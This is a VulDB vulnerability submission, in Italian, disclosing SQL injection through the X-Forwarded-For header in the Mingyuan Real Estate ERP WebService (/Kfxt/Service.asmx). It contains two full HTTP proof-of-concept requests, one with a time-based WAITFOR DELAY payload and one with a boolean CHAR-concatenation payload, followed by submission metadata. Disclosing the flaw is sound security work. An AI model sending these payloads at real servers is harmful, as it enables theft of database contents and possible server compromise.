Invia #513708: Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerability
| Titolo | Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerability |
|---|---|
| Descrizione | When the Mingyuan Real Estate ERP system WebService service verifies client IP permissions, it does not strictly filter and obtain the X-Forwarded-For real IP, resulting in a SQL injection vulnerability. Once an authenticated malicious attacker uses the SQL injection vulnerability to obtain information in the database (such as administrator background password, site user personal information), the attacker can even read commands to the server with high permissions to further obtain server system permissions. poc1: POST /Kfxt/Service.asmx HTTP/1.1 Host: User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Content-Type: text/xml; charset=utf-8 X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:5'-- SOAPAction: http://www.mysoft.com.cn/queryProjects Content-Length: 408 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <queryProjects xmlns="http://www.mysoft.com.cn/"> <inpXML><xml><buname>abc</buname></xml></inpXML> </queryProjects> </soap:Body> </soap:Envelope> poc2: POST /Kfxt/Service.asmx HTTP/1.1 Host: User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Content-Type: text/xml; charset=utf-8 X-Forwarded-For: 127.0.0.1') AND 6994 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6994=6994) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('MEuY'='MEuY SOAPAction: http://www.mysoft.com.cn/queryProjects Content-Length: 408 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <queryProjects xmlns="http://www.mysoft.com.cn/"> <inpXML><xml><buname>abc</buname></xml></inpXML> </queryProjects> </soap:Body> </soap:Envelope> |
| Fonte | ⚠️ https:/ |
| Utente | afish (UID 82290) |
| Sottomissione | 04/03/2025 03:46 (1 Anno fa) |
| Moderazione | 15/03/2025 23:09 (12 days later) |
| Stato | Accettato |
| Voce VulDB | 299825 [Shenzhen Mingyuan Cloud Technology Mingyuan Real Estate ERP System 1.0 HTTP Header /Kfxt/Service.asmx X-Forwarded-For iniezione SQL] |
| Punti | 20 |